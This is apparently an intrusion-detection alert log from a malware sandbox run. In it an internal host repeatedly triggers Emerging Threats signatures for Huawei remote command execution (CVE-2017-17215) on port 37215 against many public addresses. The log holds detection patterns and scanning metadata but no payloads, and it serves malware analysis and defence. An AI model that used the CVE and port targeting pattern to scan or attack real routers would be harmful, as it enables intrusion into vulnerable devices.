                                                    07/10/24-08:27:13.800580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687437215192.168.2.1441.41.185.74
                                                    07/10/24-08:26:53.114397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774837215192.168.2.14131.198.26.71
                                                    07/10/24-08:26:45.631888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469037215192.168.2.14101.167.134.163
                                                    07/10/24-08:27:28.139469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098637215192.168.2.14197.212.33.140
                                                    07/10/24-08:26:17.992846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347037215192.168.2.1438.69.98.99
                                                    07/10/24-08:26:49.755062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14197.64.136.24
                                                    07/10/24-08:27:30.509826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719037215192.168.2.1462.95.230.21
                                                    07/10/24-08:27:17.088792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072437215192.168.2.14172.206.236.74
                                                    07/10/24-08:27:33.823408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861837215192.168.2.14197.175.130.22
                                                    07/10/24-08:26:28.743244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882637215192.168.2.14157.134.237.46
                                                    07/10/24-08:26:11.522836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778637215192.168.2.14157.242.244.136
                                                    07/10/24-08:26:59.630762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469637215192.168.2.14157.187.42.10
                                                    07/10/24-08:26:31.106544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.1441.22.183.223
                                                    07/10/24-08:27:19.264327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5444837215192.168.2.1441.69.181.119
                                                    07/10/24-08:27:02.720199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257837215192.168.2.1441.190.106.233
                                                    07/10/24-08:26:47.967087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805637215192.168.2.14128.239.182.133
                                                    07/10/24-08:27:24.956941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431237215192.168.2.14221.55.30.79
                                                    07/10/24-08:27:31.468333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152637215192.168.2.1489.102.87.82
                                                    07/10/24-08:26:14.781541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577037215192.168.2.14157.39.160.36
                                                    07/10/24-08:27:02.951935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374637215192.168.2.1443.208.36.108
                                                    07/10/24-08:26:15.879518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823237215192.168.2.14197.253.91.102
                                                    07/10/24-08:27:05.190892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340037215192.168.2.14104.126.215.142
                                                    07/10/24-08:26:48.032433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.1437.254.125.57
                                                    07/10/24-08:27:24.959709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575837215192.168.2.14157.72.84.24
                                                    07/10/24-08:26:49.861410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306437215192.168.2.1441.138.245.116
                                                    07/10/24-08:27:22.871657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627637215192.168.2.14157.148.213.40
                                                    07/10/24-08:26:33.221493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728437215192.168.2.141.0.171.77
                                                    07/10/24-08:26:26.435270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.1460.228.126.83
                                                    07/10/24-08:27:16.990207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531237215192.168.2.14197.87.48.212
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197837215192.168.2.14197.114.236.242
                                                    07/10/24-08:27:33.751241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097637215192.168.2.1441.222.90.5
                                                    07/10/24-08:26:14.808084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414037215192.168.2.14157.199.60.242
                                                    07/10/24-08:27:23.953433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683237215192.168.2.14156.96.179.232
                                                    07/10/24-08:27:07.369719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731237215192.168.2.1441.69.236.135
                                                    07/10/24-08:26:11.616592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854637215192.168.2.1441.251.90.178
                                                    07/10/24-08:26:38.637224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594037215192.168.2.14157.253.172.147
                                                    07/10/24-08:26:25.447222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422837215192.168.2.14146.10.115.199
                                                    07/10/24-08:26:31.099598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888237215192.168.2.1441.238.163.186
                                                    07/10/24-08:26:36.388728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037837215192.168.2.14212.248.94.180
                                                    07/10/24-08:26:57.566526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988237215192.168.2.14197.149.39.90
                                                    07/10/24-08:26:38.590272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.14157.70.187.18
                                                    07/10/24-08:27:23.452507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870837215192.168.2.14103.119.148.78
                                                    07/10/24-08:27:32.603772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564437215192.168.2.1435.65.209.182
                                                    07/10/24-08:26:51.992041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322437215192.168.2.1441.198.103.76
                                                    07/10/24-08:26:20.119674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827037215192.168.2.14197.160.129.91
                                                    07/10/24-08:26:47.739348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417437215192.168.2.14197.147.119.152
                                                    07/10/24-08:27:20.431094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757037215192.168.2.14216.127.38.60
                                                    07/10/24-08:27:22.487883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019837215192.168.2.14197.18.23.165
                                                    07/10/24-08:26:23.341408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327837215192.168.2.1434.71.9.104
                                                    07/10/24-08:26:14.806375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550637215192.168.2.14124.147.201.209
                                                    07/10/24-08:27:22.482500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.14157.70.50.230
                                                    07/10/24-08:27:05.134098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265037215192.168.2.14157.38.242.104
                                                    07/10/24-08:26:15.838887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045637215192.168.2.14197.163.83.253
                                                    07/10/24-08:26:28.873311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090837215192.168.2.14157.167.169.189
                                                    07/10/24-08:27:05.205582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201437215192.168.2.14197.157.49.2
                                                    07/10/24-08:26:11.088418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808637215192.168.2.1441.117.164.47
                                                    07/10/24-08:26:55.277913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654837215192.168.2.14201.105.21.202
                                                    07/10/24-08:26:43.752339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049837215192.168.2.14157.191.201.191
                                                    07/10/24-08:27:31.530342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768037215192.168.2.14197.160.110.180
                                                    07/10/24-08:26:57.525834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973237215192.168.2.14201.134.162.53
                                                    07/10/24-08:26:31.086358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323837215192.168.2.14197.41.227.88
                                                    07/10/24-08:26:51.945867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869437215192.168.2.1452.41.77.14
                                                    07/10/24-08:26:14.824394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480637215192.168.2.1441.144.79.34
                                                    07/10/24-08:27:24.989466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.1441.110.21.73
                                                    07/10/24-08:27:17.025929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654037215192.168.2.14197.40.218.124
                                                    07/10/24-08:26:28.633742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632037215192.168.2.14150.34.98.174
                                                    07/10/24-08:26:45.684661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035837215192.168.2.14162.155.214.86
                                                    07/10/24-08:26:41.436580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386637215192.168.2.14157.59.173.135
                                                    07/10/24-08:26:45.591326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616237215192.168.2.1462.39.102.200
                                                    07/10/24-08:26:17.969206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14197.250.82.5
                                                    07/10/24-08:26:29.764687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037037215192.168.2.1441.250.32.71
                                                    07/10/24-08:27:11.484903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640837215192.168.2.14206.63.146.211
                                                    07/10/24-08:26:36.436089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962037215192.168.2.1454.218.150.225
                                                    07/10/24-08:26:53.147392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.1481.7.51.122
                                                    07/10/24-08:27:29.335030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504637215192.168.2.14157.210.190.77
                                                    07/10/24-08:27:22.483673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733437215192.168.2.1431.35.208.112
                                                    07/10/24-08:26:14.622082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879837215192.168.2.14197.97.5.171
                                                    07/10/24-08:26:31.102148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473837215192.168.2.14104.49.188.240
                                                    07/10/24-08:27:19.319330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680437215192.168.2.14157.76.218.109
                                                    07/10/24-08:26:14.819021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956837215192.168.2.14157.161.171.203
                                                    07/10/24-08:26:51.939939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779837215192.168.2.1441.141.47.220
                                                    07/10/24-08:26:15.869114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768637215192.168.2.1462.156.25.255
                                                    07/10/24-08:27:14.875328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334837215192.168.2.1464.56.254.204
                                                    07/10/24-08:26:28.918557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341837215192.168.2.14197.240.98.71
                                                    07/10/24-08:26:23.355415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766037215192.168.2.14163.91.121.228
                                                    07/10/24-08:26:25.481164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738437215192.168.2.1441.111.252.236
                                                    07/10/24-08:26:26.437394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008437215192.168.2.14157.200.18.199
                                                    07/10/24-08:26:43.901801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039037215192.168.2.1441.177.46.175
                                                    07/10/24-08:26:28.741388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165037215192.168.2.14157.165.132.160
                                                    07/10/24-08:26:26.596557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622637215192.168.2.14157.74.199.250
                                                    07/10/24-08:27:16.994273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5076437215192.168.2.14197.141.181.232
                                                    07/10/24-08:26:26.603545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490037215192.168.2.14197.31.33.0
                                                    07/10/24-08:26:49.770059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443637215192.168.2.144.234.60.245
                                                    07/10/24-08:27:36.290826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686637215192.168.2.14157.89.15.135
                                                    07/10/24-08:26:43.594845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704037215192.168.2.14197.89.230.4
                                                    07/10/24-08:26:49.777925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931237215192.168.2.14157.15.170.125
                                                    07/10/24-08:26:25.485582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627437215192.168.2.14167.253.197.24
                                                    07/10/24-08:26:25.514524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785037215192.168.2.14197.11.191.242
                                                    07/10/24-08:26:15.819224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920637215192.168.2.14157.117.75.243
                                                    07/10/24-08:26:15.793642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893037215192.168.2.1441.147.45.84
                                                    07/10/24-08:27:20.478787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924837215192.168.2.14157.97.22.165
                                                    07/10/24-08:27:28.181617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061237215192.168.2.1458.2.107.117
                                                    07/10/24-08:27:24.937282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246637215192.168.2.1437.115.67.4
                                                    07/10/24-08:27:19.170631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314837215192.168.2.14220.186.44.88
                                                    07/10/24-08:26:28.773956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923437215192.168.2.1467.120.114.140
                                                    07/10/24-08:26:33.151906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910037215192.168.2.14157.76.184.46
                                                    07/10/24-08:26:59.753614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300037215192.168.2.14157.10.64.164
                                                    07/10/24-08:26:28.859810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918237215192.168.2.1441.101.111.57
                                                    07/10/24-08:26:31.079428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031437215192.168.2.14157.141.78.203
                                                    07/10/24-08:26:11.624082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064437215192.168.2.1441.100.17.22
                                                    07/10/24-08:26:11.167098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488437215192.168.2.14157.12.119.99
                                                    07/10/24-08:27:16.996210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862437215192.168.2.14197.101.126.159
                                                    07/10/24-08:27:30.450144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700637215192.168.2.14197.174.93.172
                                                    07/10/24-08:26:18.011979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892237215192.168.2.14197.176.82.87
                                                    07/10/24-08:26:13.852643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565437215192.168.2.1489.61.31.168
                                                    07/10/24-08:26:28.639022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036237215192.168.2.1441.63.211.56
                                                    07/10/24-08:26:52.073471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.1441.216.210.125
                                                    07/10/24-08:27:07.397388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511237215192.168.2.1441.129.215.7
                                                    07/10/24-08:26:59.879112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776037215192.168.2.1441.211.62.180
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965237215192.168.2.14197.42.154.109
                                                    07/10/24-08:26:41.360429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682037215192.168.2.14197.5.38.250
                                                    07/10/24-08:26:47.840921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277237215192.168.2.1441.141.19.45
                                                    07/10/24-08:26:55.354961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704637215192.168.2.14157.120.126.187
                                                    07/10/24-08:26:36.383981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278037215192.168.2.14212.236.174.49
                                                    07/10/24-08:27:20.412517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.14129.198.179.85
                                                    07/10/24-08:27:30.529525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704837215192.168.2.1441.250.144.224
                                                    07/10/24-08:26:29.864759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403437215192.168.2.14197.107.102.13
                                                    07/10/24-08:26:41.615140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105837215192.168.2.1441.72.1.220
                                                    07/10/24-08:26:57.650835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085837215192.168.2.14157.11.4.244
                                                    07/10/24-08:27:27.114330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621237215192.168.2.1441.29.32.33
                                                    07/10/24-08:27:22.480250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024037215192.168.2.14197.17.81.150
                                                    07/10/24-08:27:24.942132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670837215192.168.2.14157.140.209.200
                                                    07/10/24-08:26:14.827128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778037215192.168.2.1441.197.23.71
                                                    07/10/24-08:26:36.433898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176037215192.168.2.14218.126.44.163
                                                    07/10/24-08:27:24.887836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977437215192.168.2.1441.15.53.242
                                                    07/10/24-08:26:55.457969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941037215192.168.2.14197.115.184.253
                                                    07/10/24-08:26:55.313127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520437215192.168.2.14135.141.20.238
                                                    07/10/24-08:26:51.988917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848637215192.168.2.1441.177.24.4
                                                    07/10/24-08:26:33.228280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467637215192.168.2.14162.32.70.209
                                                    07/10/24-08:27:23.939164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362837215192.168.2.14197.217.136.15
                                                    07/10/24-08:26:59.579530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117037215192.168.2.14197.247.234.114
                                                    07/10/24-08:27:10.655390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.1446.10.199.225
                                                    07/10/24-08:26:45.619678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872437215192.168.2.14197.240.58.135
                                                    07/10/24-08:27:13.983533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891237215192.168.2.1441.163.26.170
                                                    07/10/24-08:27:13.976199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886237215192.168.2.14157.68.22.215
                                                    07/10/24-08:26:38.590272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523837215192.168.2.1441.168.131.180
                                                    07/10/24-08:26:45.619678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969237215192.168.2.1441.101.99.129
                                                    07/10/24-08:27:30.419826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370037215192.168.2.14197.182.12.196
                                                    07/10/24-08:26:38.621748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317637215192.168.2.1441.25.216.214
                                                    07/10/24-08:26:45.603298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.1441.17.174.54
                                                    07/10/24-08:26:55.308630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759437215192.168.2.14157.250.46.59
                                                    07/10/24-08:27:11.490604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222637215192.168.2.14157.197.112.120
                                                    07/10/24-08:26:28.912648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421837215192.168.2.1441.168.167.153
                                                    07/10/24-08:27:34.122449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.14157.46.252.122
                                                    07/10/24-08:27:05.230941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658437215192.168.2.1493.235.95.130
                                                    07/10/24-08:26:17.959053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295637215192.168.2.1441.156.242.243
                                                    07/10/24-08:26:22.284234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.14157.157.198.22
                                                    07/10/24-08:27:23.900163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665437215192.168.2.14197.228.203.101
                                                    07/10/24-08:26:29.854453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199237215192.168.2.14197.38.187.100
                                                    07/10/24-08:27:02.841622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578637215192.168.2.14120.153.145.196
                                                    07/10/24-08:26:29.883548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367837215192.168.2.14157.245.34.185
                                                    07/10/24-08:27:02.982292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.14202.80.130.53
                                                    07/10/24-08:27:19.353550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911237215192.168.2.14193.205.155.220
                                                    07/10/24-08:26:14.762388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4281237215192.168.2.14197.150.149.204
                                                    07/10/24-08:27:32.588924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810837215192.168.2.14157.177.228.90
                                                    07/10/24-08:27:20.422922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501237215192.168.2.14157.66.136.37
                                                    07/10/24-08:26:31.098098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165637215192.168.2.1457.224.117.16
                                                    07/10/24-08:27:27.050359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573437215192.168.2.1441.142.234.58
                                                    07/10/24-08:26:26.622039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691437215192.168.2.1441.42.23.166
                                                    07/10/24-08:27:22.835700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058237215192.168.2.14106.25.11.166
                                                    07/10/24-08:26:49.921698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3333637215192.168.2.14197.146.73.219
                                                    07/10/24-08:27:31.454702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946237215192.168.2.1441.23.94.93
                                                    07/10/24-08:27:07.281764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755837215192.168.2.14157.69.139.156
                                                    07/10/24-08:27:10.727335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321437215192.168.2.14197.33.115.1
                                                    07/10/24-08:27:14.856622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.1439.54.191.184
                                                    07/10/24-08:26:49.919552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812437215192.168.2.1441.230.73.174
                                                    07/10/24-08:26:15.806534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833237215192.168.2.14157.85.152.252
                                                    07/10/24-08:26:31.094211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804637215192.168.2.14197.241.5.165
                                                    07/10/24-08:26:36.395697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689837215192.168.2.1425.195.89.152
                                                    07/10/24-08:27:11.538879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840037215192.168.2.1492.251.81.133
                                                    07/10/24-08:27:08.352248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.14157.72.115.84
                                                    07/10/24-08:27:02.891587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135037215192.168.2.14197.130.77.176
                                                    07/10/24-08:27:07.337893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525837215192.168.2.1441.69.247.210
                                                    07/10/24-08:26:36.429054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.14197.250.148.84
                                                    07/10/24-08:26:14.801295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897437215192.168.2.14157.201.102.76
                                                    07/10/24-08:26:29.746967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747237215192.168.2.1448.16.44.193
